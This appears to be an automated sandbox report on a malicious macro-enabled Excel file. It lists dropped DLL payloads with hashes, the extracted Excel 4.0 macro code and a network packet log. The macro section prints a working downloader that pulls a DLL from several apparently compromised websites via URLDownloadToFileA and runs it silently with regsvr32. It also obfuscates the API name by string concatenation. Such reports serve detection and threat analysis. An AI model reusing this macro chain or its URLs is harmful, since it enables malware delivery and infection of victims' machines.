Malicious:	false
Reputation:	low
Preview:	p...... .............0..(....................................................... ........%,.)......(...........@...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.2.5.2.c.e.6.b.2.2.9.d.8.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ouyGhPOm[1].dll

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	626176
Entropy (8bit):	7.006858827919653
Encrypted:	false
SSDEEP:	12288:J1U8sNY8/z0rYebzwdKCoGEAbcVBLku8w:oq6z0rYcMdKVGEZBLkuF
MD5:	C36A7D65C0ABBA2A1DC4C30D1B1BCCED
SHA1:	1C8388A6D37CBDC3E10C7100C9BDDEAF4ED316FC
SHA-256:	DD26D4BD1C21FB4777D52921A9E0F27BC0EF8C6E877AED020A696E8281FCC4A8
SHA-512:	7B603D757FFC02B28E426E849BCD1D33F43E9EF435D339409D791443620277A5E51881C2D72D84AC0D17B94EC9CF8E2E390EF18D1465623531B0E0589F0EA2F5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Reputation:	low
IE Cache URL:	http://danialteb.com/wp-admin/NqRYgwPERRPoTs/
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........./Z..A...A...A..h,...A..h:...A...@...A.......A.......A.....,.A.......A.......A.......A.......A.Rich..A.........................PE..L...(. b...........!.....................................................................@..............................................v...................... ...................................@...@...................\|...@....................text............................... ..`.rdata..............................@..@.data...`h..........................@....rsrc....v.......x...,..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2636759D.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 2415 x 64, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	29560
Entropy (8bit):	7.903149132963418
Encrypted:	false
SSDEEP:	768:lzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+UW:JtT5fTR4Lh1NisFYBc3cr+UW
MD5:	5BAB80911CB5E910D18D366B360C7B4B
SHA1:	D40007FEC139A200DE1A3B84774C81AD28321B63
SHA-256:	E5191E67B0C6E3EA75AE1E6ED836B0124F21E16FD087B6C3475FD54E71B547D5
SHA-512:	46B338ECE9FDEB79EF3F5758F3433EB966D9149ED1C3F6BAAD48E76DB79DF24994294089D66B7AEE5BAC14366A4C7D3F98E17EBCBFBBA65B45B01EDD1597D2FC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...o...@........Q....sRGB.........gAMA......a.....pHYs..!...!........s.IDATx^.wX....].d$.....TT..1....s@E...`....s...0..vWWwM.k.?.w.W=......_=..#...5..U..vU...v.....................Q.&.................... .........................l"............................................x.&.................... .........................l"............................................x.......C..........!?.>-...A.....W.54W4.o..`.B......................s..6......ZY.p#.r.r...A.Kf.-.\|.pbp!.w..e.K..-..R..ZW]L.Bo.......................?..j..6..d...Z..D.?K.v....N.._....m.........................'..O.&...v..X..2....K"b.iet...=........................6.m+#-...T..#.&.*.x.,;..]+Ch.......................~.M...-&.60.[.$.1).pID..d.&......................~8?.&...z.Z..EB^.{..V\|....L.....................?..h._4.E....J\z.<..V.........,.. J..../.."....................H~.M..`&.....f..Y....?\|.......<......0.8+..."t\....................z..e..J.k#.&.X@!..b.........X.....&.J(.(x.[.7

C:\Users\user\AppData\Local\Temp\CabE705.tmp

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	Microsoft Cabinet archive data, 60992 bytes, 1 file
Category:	dropped
Size (bytes):	60992
Entropy (8bit):	7.994637486921971
Encrypted:	true
SSDEEP:	1536:1ccLOuSwR3W8vM1pjd8MpGwIMESUnWWiidx34:1ccLm6W8vUBCMpGwIMEDnqe4
MD5:	637481DF32351129E60560D5A5C100B5
SHA1:	A46AEE6E5A4A4893FBA5806BCC14FC7FB3CE80AE
SHA-256:	1F1029D94CA4656A577D554CEDD79D447658F475AF08620084897A5523587052
SHA-512:	604BFD0A78A57DFDDD45872803501AD89491E37E89E0778B0F13644FA9164FF509955A57469DFDD65A05BBEDAF0ACB669F68430E84800D17EFE7D360A70569E3
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF....@.......,...................I.......]t........VT+V .authroot.stl.K.&.4..CK..<Tk...c_.d....A.K.....Y.f.]%.BJ$RHnT..i/.]...s.H..k....n.3.......S..9.s.....3H$M.%...h..qV.=M..].4.I.....V:F.h]......B`..,......D.0a....H.G..:...XF.F..MJ`.H. 7......._....lE..he.4\|.?....h...7..P~8.\|.,. .....#0+..o...g...}U2n............'.Dp.;..f..ljX.Dx..r<'.1RA3B0<..D.z...)D\|..8<..c..'XH..I,.Y..d.b.".A......cm_nVb[w..rDp.....y%.\|7...^.#.#[...3~3.g..CN......k;...C.`.C.iB.`-...\|.....y.(....]~`>... .p..q<..g..i...y..\|.....I...T8B.Ag#U......G.9+.x6..a.c.3...X.4E........N..:X.F...S...X...ku..O.J...)Z....PAk..%.+..n..z<.2.......w2c@.((*.J.dN...\!o@.........0..3.`.DU.3.%0.G...4Sv...5.T.?.......p..".........\|..j.4.H...g.(...^.....w.......\|...#..og)>..t.}.k.G\|.2K.5..ik.......0..~ ">......A...ku..d..Y..@D....YO.{.9..:)..L..=D..O...6.n....ui<..w.[O...P>..y.L....J......r.!.5.u.3..-`..r,aH.B <..t..8.c.{u.<'.3.........u.3..[W.....2...$..eAo.m...w...............g$m.`..

C:\Users\user\AppData\Local\Temp\TarE706.tmp

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	data
Category:	modified
Size (bytes):	160861
Entropy (8bit):	6.301243810050655
Encrypted:	false
SSDEEP:	1536:0I/6crtilgCyNY2Ip/5ib6NWdm1wpTru2RPZz04D8rlCMiB3XlMt63:070imCy/dm0Tru2RN97MiVG43
MD5:	30644DA711C99BE812B06023C163B751
SHA1:	EFFC167CE6206A4E92375C9509943CC86058E3C7
SHA-256:	96DBA3D67364C1E75DAB241D4A023B48F4D6453F495175B210F525E930CF144B
SHA-512:	7799722409CB4BD9098312235824D72427F8761495B2824798E69AF43021E180BBC2679E70CF6EC3CDA5C8422CE601051AD674587321C5F7419FAED1B027432E
Malicious:	false
Preview:	0..tX...H.........tH0..tC...1.0...`.H.e......0..d...+.....7.....d.0..d.0...+.....7........(.?.....220222184440Z0...+......0..dY0..D.....`...@.,..0..0.r1..0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o

C:\Users\user\Desktop\~$doc_82555.xlsm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\sei.ocx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	626176
Entropy (8bit):	7.006858827919653
Encrypted:	false
SSDEEP:	12288:J1U8sNY8/z0rYebzwdKCoGEAbcVBLku8w:oq6z0rYcMdKVGEZBLkuF
MD5:	C36A7D65C0ABBA2A1DC4C30D1B1BCCED
SHA1:	1C8388A6D37CBDC3E10C7100C9BDDEAF4ED316FC
SHA-256:	DD26D4BD1C21FB4777D52921A9E0F27BC0EF8C6E877AED020A696E8281FCC4A8
SHA-512:	7B603D757FFC02B28E426E849BCD1D33F43E9EF435D339409D791443620277A5E51881C2D72D84AC0D17B94EC9CF8E2E390EF18D1465623531B0E0589F0EA2F5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........./Z..A...A...A..h,...A..h:...A...@...A.......A.......A.....,.A.......A.......A.......A.......A.Rich..A.........................PE..L...(. b...........!.....................................................................@..............................................v...................... ...................................@...@...................\|...@....................text............................... ..`.rdata..............................@..@.data...`h..........................@....rsrc....v.......x...,..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\Bvzagchljm\dwkzewjivpn.djh (copy)

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	626176
Entropy (8bit):	7.006858827919653
Encrypted:	false
SSDEEP:	12288:J1U8sNY8/z0rYebzwdKCoGEAbcVBLku8w:oq6z0rYcMdKVGEZBLkuF
MD5:	C36A7D65C0ABBA2A1DC4C30D1B1BCCED
SHA1:	1C8388A6D37CBDC3E10C7100C9BDDEAF4ED316FC
SHA-256:	DD26D4BD1C21FB4777D52921A9E0F27BC0EF8C6E877AED020A696E8281FCC4A8
SHA-512:	7B603D757FFC02B28E426E849BCD1D33F43E9EF435D339409D791443620277A5E51881C2D72D84AC0D17B94EC9CF8E2E390EF18D1465623531B0E0589F0EA2F5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........./Z..A...A...A..h,...A..h:...A...@...A.......A.......A.....,.A.......A.......A.......A.......A.Rich..A.........................PE..L...(. b...........!.....................................................................@..............................................v...................... ...................................@...@...................\|...@....................text............................... ..`.rdata..............................@..@.data...`h..........................@....rsrc....v.......x...,..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Microsoft Excel 2007+
Entropy (8bit):	7.732822009162956
TrID:	Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52% Excel Microsoft Office Open XML Format document (40004/1) 40.40% ZIP compressed archive (8000/1) 8.08%
File name:	doc_82555.xlsm
File size:	47652
MD5:	7bde64baa68b904ebf18541faa6bfce7
SHA1:	8f6d4160c09119c3169b2d013533a60a0c2bdce3
SHA256:	2f924502bd8e335411aa8a199d3071a25807e4d333b4dad175e4fe5da3c1ab96
SHA512:	b3655b5ac44394480127ec467a1c9403c64d40b84b29a05f73467443400309410ae7826ac628cbfc935c54ceae75cea3e8a6bac469298248092982d7be649380
SSDEEP:	768:wdolODOevZCwrvtMezdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VfNN/u:WoIDHtT5fTR4Lh1NisFYBc3cr+UqVfNw
File Content Preview:	PK..........!.5.x.....e.......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4bcbcac

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "doc_82555.xlsm"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

Name:	Je1
Type:	3
Final:	False
Visible:	False
Protected:	False
Je13False0Falsepre16,3,=CHAR("101")

Name:	Je2
Type:	3
Final:	False
Visible:	False
Protected:	False
Je23False0Falsepost5,4,e

Name:	EFALGV
Type:	4
Final:	False
Visible:	False
Protected:	False
EFALGV4False0Falsepost6,3,=FORMULA("e","e")=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gymsportive.com/0zwe/pSiUh/","..\sei.ocx",0,0)",D10)=FORMULA("=IF(GFGH1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://danialteb.com/wp-admin/NqRYgwPERRPoTs/","..\sei.ocx",0,0))",D12)=FORMULA("=IF(GFGH2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/IduhreKcPbD/","..\sei.ocx",0,0))",D14)=FORMULA("=IF(GFGH3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://skanev.com/wp-content/AT5Doj207guJES0BMk/","..\sei.ocx",0,0))",D16)=FORMULA("=IF(GFGH4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://praachichemfood.com/old-files==-/vo68ZI/","..\sei.ocx",0,0))",D18)=FORMULA("=IF(GFGH5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://curtistreeclimbing.com/css/2oFtx1t5P8qcVKnCl/","..\sei.ocx",0,0))",D20)=FORMULA("=IF(GFGH6<0, CLOSE(0),)",D22)=FORMULA("=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx")",D24)=FORMULA("=RETURN()",D33)9,3,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gymsportive.com/0zwe/pSiUh/","..\sei.ocx",0,0)11,3,=IF(GFGH1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://danialteb.com/wp-admin/NqRYgwPERRPoTs/","..\sei.ocx",0,0))13,3,=IF(GFGH2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/IduhreKcPbD/","..\sei.ocx",0,0))15,3,=IF(GFGH3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://skanev.com/wp-content/AT5Doj207guJES0BMk/","..\sei.ocx",0,0))17,3,=IF(GFGH4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://praachichemfood.com/old-files==-/vo68ZI/","..\sei.ocx",0,0))19,3,=IF(GFGH5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://curtistreeclimbing.com/css/2oFtx1t5P8qcVKnCl/","..\sei.ocx",0,0))21,3,=IF(GFGH6<0, CLOSE(0),)23,3,=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx")32,3,=RETURN()

Name:	EFALGV
Type:	4
Final:	False
Visible:	False
Protected:	False
EFALGV4False0Falsepre6,3,=FORMULA("e",'Je2'!E6)=FORMULA("=CALL("urlmon","URLDownloadToFil"&'Je2'!E6&"A","JJCCBB",0,"http://gymsportive.com/0zwe/pSiUh/","..\sei.ocx",0,0)",D10)=FORMULA("=IF(GFGH1<0, CALL("urlmon","URLDownloadToFil"&'Je2'!E6&"A","JJCCBB",0,"http://danialteb.com/wp-admin/NqRYgwPERRPoTs/","..\sei.ocx",0,0))",D12)=FORMULA("=IF(GFGH2<0, CALL("urlmon","URLDownloadToFil"&'Je2'!E6&"A","JJCCBB",0,"http://totalplaytuxtla.com/sitio/IduhreKcPbD/","..\sei.ocx",0,0))",D14)=FORMULA("=IF(GFGH3<0, CALL("urlmon","URLDownloadToFil"&'Je2'!E6&"A","JJCCBB",0,"http://skanev.com/wp-content/AT5Doj207guJES0BMk/","..\sei.ocx",0,0))",D16)=FORMULA("=IF(GFGH4<0, CALL("urlmon","URLDownloadToFil"&'Je2'!E6&"A","JJCCBB",0,"http://praachichemfood.com/old-files==-/vo68ZI/","..\sei.ocx",0,0))",D18)=FORMULA("=IF(GFGH5<0, CALL("urlmon","URLDownloadToFil"&'Je2'!E6&"A","JJCCBB",0,"http://curtistreeclimbing.com/css/2oFtx1t5P8qcVKnCl/","..\sei.ocx",0,0))",D20)=FORMULA("=IF(GFGH6<0, CLOSE(0),)",D22)=FORMULA("=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx")",D24)=FORMULA("=RETURN()",D33)

Name:	Je1
Type:	3
Final:	False
Visible:	False
Protected:	False
Je13False0Falsepost16,3,=CHAR("101")

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 4, 2022 15:23:44.583930016 CET	49165	80	192.168.2.22	212.64.200.154
Mar 4, 2022 15:23:44.646320105 CET	80	49165	212.64.200.154	192.168.2.22
Mar 4, 2022 15:23:44.646418095 CET	49165	80	192.168.2.22	212.64.200.154
Mar 4, 2022 15:23:44.646928072 CET	49165	80	192.168.2.22	212.64.200.154
Mar 4, 2022 15:23:44.710865974 CET	80	49165	212.64.200.154	192.168.2.22
Mar 4, 2022 15:23:44.710941076 CET	80	49165	212.64.200.154	192.168.2.22
Mar 4, 2022 15:23:44.710967064 CET	49165	80	192.168.2.22	212.64.200.154
Mar 4, 2022 15:23:44.710983992 CET	80	49165	212.64.200.154	192.168.2.22
Mar 4, 2022 15:23:44.711024046 CET	49165	80	192.168.2.22	212.64.200.154
Mar 4, 2022 15:23:44.711025000 CET	80	49165	212.64.200.154	192.168.2.22
Mar 4, 2022 15:23:44.711086035 CET	49165	80	192.168.2.22	212.64.200.154
Mar 4, 2022 15:23:44.711412907 CET	49165	80	192.168.2.22	212.64.200.154
Mar 4, 2022 15:23:44.711473942 CET	49165	80	192.168.2.22	212.64.200.154
Mar 4, 2022 15:23:44.749728918 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:44.771684885 CET	80	49165	212.64.200.154	192.168.2.22
Mar 4, 2022 15:23:44.771744013 CET	80	49165	212.64.200.154	192.168.2.22
Mar 4, 2022 15:23:44.771776915 CET	49165	80	192.168.2.22	212.64.200.154
Mar 4, 2022 15:23:44.771857977 CET	49165	80	192.168.2.22	212.64.200.154
Mar 4, 2022 15:23:44.850478888 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:44.850632906 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:44.851373911 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:44.951838970 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:44.961889029 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:44.961986065 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:44.962023973 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:44.962038040 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:44.962053061 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:44.962090015 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:44.962100029 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:44.962141991 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:44.962208033 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:44.962254047 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:44.962306023 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:44.962357044 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:44.962366104 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:44.962409019 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:44.962460041 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:44.962472916 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:44.963330030 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:44.976617098 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063043118 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063103914 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063170910 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063175917 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063200951 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063215017 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063235998 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063255072 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063261986 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063292027 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063312054 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063328981 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063337088 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063368082 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063390970 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063404083 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063424110 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063441038 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063457012 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063477993 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063491106 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063518047 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063519955 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063558102 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063592911 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063616037 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063631058 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063643932 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063668966 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063678026 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063705921 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063725948 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063743114 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063752890 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063780069 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063800097 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063817978 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.063829899 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.063874960 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.065109015 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.163242102 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.163281918 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.163306952 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.163335085 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.163412094 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.163439035 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.163454056 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.163465023 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.163481951 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.163486004 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.163489103 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.163511992 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.163522959 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.163549900 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.163671017 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.163696051 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.163723946 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.163727045 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.163749933 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.163750887 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.163778067 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.163810968 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.163924932 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.163964987 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.163997889 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164021015 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.164046049 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.164053917 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164093018 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164132118 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164134026 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.164139032 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.164220095 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164277077 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.164285898 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164350033 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164386988 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164407969 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.164433956 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.164561987 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164602041 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164618969 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.164640903 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164645910 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.164680004 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164697886 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.164716959 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164745092 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.164755106 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164774895 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.164789915 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164807081 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.164818048 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.164830923 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164853096 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.164871931 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164880991 CET	49166	80	192.168.2.22	194.5.188.24
Mar 4, 2022 15:23:45.164911032 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164951086 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.164988995 CET	80	49166	194.5.188.24	192.168.2.22
Mar 4, 2022 15:23:45.165029049 CET	80	49166	194.5.188.24	192.168.2.22
